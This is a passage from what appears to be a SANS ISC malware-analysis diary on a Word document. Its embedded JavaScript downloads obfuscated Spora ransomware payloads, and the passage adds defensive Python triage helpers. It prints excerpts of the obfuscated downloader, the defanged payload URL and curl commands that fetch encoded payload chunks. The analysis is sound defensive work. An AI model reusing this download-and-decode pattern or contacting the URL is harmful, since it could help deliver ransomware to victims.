The JavaScript is located in word/embeddings/oleObject1.bin. Once extracted and stored in %APPDATA%\Local\Temp\Order complete.js, it is executed and downloads a malicious PE file. Let's have a look at the code (excerpt):

    try {
        c.open(deobfus("----uFuwwu", 1), deobfus("----qqq:qLU:qjqtqqq:UtF_qF_", 1) + "?ff" + loop, ...
    }
    var data = c.responseText.indexOf("|||"

The URL being requested is:

    hxxp://dev.watershowbranson.com/info.php?ffX

x being incremented by the loop.
When you try to access this URL manually, you get a different content depending on x:

    $ curl hxxp://dev.watershowbranson.com/info.php?ff1
    7,1,2,1,7,7,4,7,6,9,5,5,2|||1d6a11774069571211747695ffff7121b57476957121774709571217747695712177476957121774769571217747695...(removed)
    $ curl hxxp://dev.watershowbranson.com/info.php?ff2
    7,2,4,0,2,8,4,8,0,1,8,2,3|||1d7a30284101872406848018ffff7240b08480187240284841872402848018724028480187240284801872402848018...(removed)
    $ curl hxxp://dev.watershowbranson.com/info.php?ff3
    9,2,0,7,4,7,6,4,1,1,6,4,2|||3d7a97476711692078764116ffff9207b27641169207476451692074764116920747641169207476411692074764116...(removed)
Note the "|||" separator: the first part is a list of integers, the second part is the obfuscated data. Here is the deobfus() function (excerpt):

    var daddbdbfeed = ebcebafed
    }
    function deobfus(s, key) {
        var fcddcdfcfcfc = "$d.JkT0_gOQ7F:%(*Z,-fCIximY^DLva+WB@4u8HX)pbNhSGsloe5w"
        var buffer = abcafefaddd
        if (cfbbadafdfabf0) {

The same function is used to decode the URL:

    var foo = deobfus("----qqq:qLU:qjqtqqq:UtF_qF_", 1)

which gives:

    hxxp://dev.watershowbranson.com/info.php
Data returned by the HTTP request use another obfuscation technique. Data are passed to another function with the key being the array of integers (example as seen above: 7,1,2,1,7,7,4,7,6,9,5,5,2). The decoded payload is a PE file:

    viper cab4.exe virustotal -v
    [+] VirusTotal Report for 5dc3d99293fe7b70a9796cf04492b954:
    [*] Detecting engines:
    +-------------------+--------------------------------------------+
    | Antivirus         | Signature                                  |
    +-------------------+--------------------------------------------+
    | Baidu             | Win32.Trojan.WisdomEyes.16070401.9500.9999 |
    | CrowdStrike       | malicious_confidence_100% (D)              |
    | Cyren             | W32/Spora.E.gen!Eldorado                   |
    | Endgame           | malicious (high confidence)                |
    | F-Prot            | W32/Spora.E.gen!Eldorado                   |
    | Fortinet          | W32/GenKryptik.ADNX!tr                     |
    | Invincea          | virus.win32.sality.at                      |
    | McAfee            | Ransomware-FMFE!5DC3D99293FE               |
    | McAfee-GW-Edition | BehavesLike.Win32.Backdoor.fc              |
    | Qihoo-360         | HEUR/QVM19.1.C414.Malware.Gen              |
    | SentinelOne       | static engine - malicious                  |
    | Sophos            | Mal/Elenoocka-E                            |
    | Symantec          | ML.Attribute.HighConfidence                |
    +-------------------+--------------------------------------------+
    [*] 13 out of 61 antivirus detected 5dc3d99293fe7b70a9796cf04492b954 as malicious.
    [*] https://www.virustotal.com/file/13e7a1f1291b0ddf1587d86b94989e0d8ff4884e3f2354810130a7865d0d431c/analysis/1493313215/
In this example, we have multiple payloads downloaded with their associated key (no direct PE file); we don't see XOR encryption or Base64 encoding. Nothing suspicious, just plain text!
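Two triage helpers for this kind of sample, added here as an example and not taken from the diary or the malware: one lists the embedded objects of a .docx (a zip container) and looks for script file names inside them, the other recognises the "integers|||data" shape of the replies served by info.php so a sandbox post-processor can flag them. The script-name search in OLE package objects is a hypothetical heuristic, and every sample value below is constructed, not real data.

```python
import io
import re
import zipfile
from typing import Dict, List, Tuple

SEPARATOR = "|||"
# Constructed sample with the shape of the info.php?ffX replies in the diary; not real data.
SAMPLE_RESPONSE = "7,1,2,1,7,7,4,7,6,9,5,5,2|||1d6a11774069571211747695ffff7121b574"

def parse_response(body: str) -> Tuple[List[int], str]:
    """Split a 'key|||payload' reply into the integer key list and the payload."""
    if SEPARATOR not in body:
        raise ValueError("no '|||' separator in response")
    key_part, payload = body.split(SEPARATOR, 1)
    if not re.fullmatch(r"\d+(,\d+)*", key_part.strip()):
        raise ValueError("key part is not a comma separated integer list")
    return [int(x) for x in key_part.split(",")], payload.strip()

def is_c2_shaped(body: str) -> bool:
    """True when a reply parses as key|||payload with an even-length hex payload."""
    try:
        _, payload = parse_response(body)
    except ValueError:
        return False
    return len(payload) % 2 == 0 and re.fullmatch(r"[0-9a-fA-F]+", payload) is not None

def embedded_objects(docx) -> Dict[str, bytes]:
    """Map word/embeddings/*.bin entry names to their bytes (.docx path or file object)."""
    with zipfile.ZipFile(docx) as z:
        return {n: z.read(n) for n in z.namelist()
                if n.startswith("word/embeddings/") and n.lower().endswith(".bin")}

# Hypothetical heuristic: a Packager object stores the dropped file's name, in ASCII
# and/or UTF-16LE, so look for script-like names in both encodings.
SCRIPT_NAME = re.compile(rb"[\w .-]{1,64}\.(?:js|jse|vbs|vbe|wsf|hta)\b", re.IGNORECASE)

def script_names_in_blob(blob: bytes) -> List[str]:
    wide = blob.decode("utf-16le", "replace").encode("ascii", "replace")
    hits = {m.group(0).decode("ascii") for src in (blob, wide) for m in SCRIPT_NAME.finditer(src)}
    return sorted(hits)

def make_constructed_docx() -> io.BytesIO:
    name = "Order complete.js"  # constructed stand-in for the embedded object's content
    blob = b"\x00" * 9 + name.encode() + b"\x00" * 2 + name.encode("utf-16le") + b"\x00" * 8
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("word/embeddings/oleObject1.bin", blob)  # other document parts omitted
    buf.seek(0)
    return buf
```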
Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant